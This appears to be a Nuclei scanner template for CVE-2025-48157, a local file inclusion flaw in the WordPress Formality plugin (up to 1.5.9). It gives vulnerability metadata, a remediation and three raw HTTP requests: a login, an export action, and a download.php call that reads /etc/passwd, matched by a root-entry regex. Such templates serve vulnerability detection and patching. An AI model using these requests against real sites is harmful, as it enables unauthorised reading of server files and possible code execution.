id: CVE-2025-48157 info: name: WordPress Formality Plugin <= 1.5.9 - Local File Inclusion author: pussycat0x severity: critical description: | Michele Giorgi Formality <= 1.5.9 contains a file inclusion vulnerability caused by improper control of filename in include/require statements, letting attackers include local files, exploit requires crafted input. impact: Attackers can include local files, potentially leading to code execution or information disclosure. remediation: Update to the latest version beyond 1.5.9. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formality/formality-159-unauthenticated-local-file-inclusion - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3277800%40formality&old=3248498%40formality - https://nvd.nist.gov/vuln/detail/CVE-2025-48157 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-48157 epss-score: 0.03259 epss-percentile: 0.87378 cwe-id: CWE-98 metadata: verified: true max-request: 3 shodan-query: http.component:"WordPress" tags: cve,cve2025,wordpress,wp,wp-plugin,formality,lfi,authenticated http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP+Cookie+check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?action=export_formality_result&form_id=1 HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/uploads/formality/storage/download.php?wproot=/var/www/html&file=/etc/passwd HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "contains(content_type_3, 'text/plain')" - "regex('root:.*:0:0:', body_3)" - "status_code_3 == 200" condition: and # digest: 4a0a0047304502210089353520e9858ea81f3abf87b262add1288550c75d3846021f870a04fb7b9f8d0220502bc6aec5a2cd2ea4696125985a70dbba09c71a91d4fa82d65fcf8688290ead:922c64590222798bb761d5b6d8e72950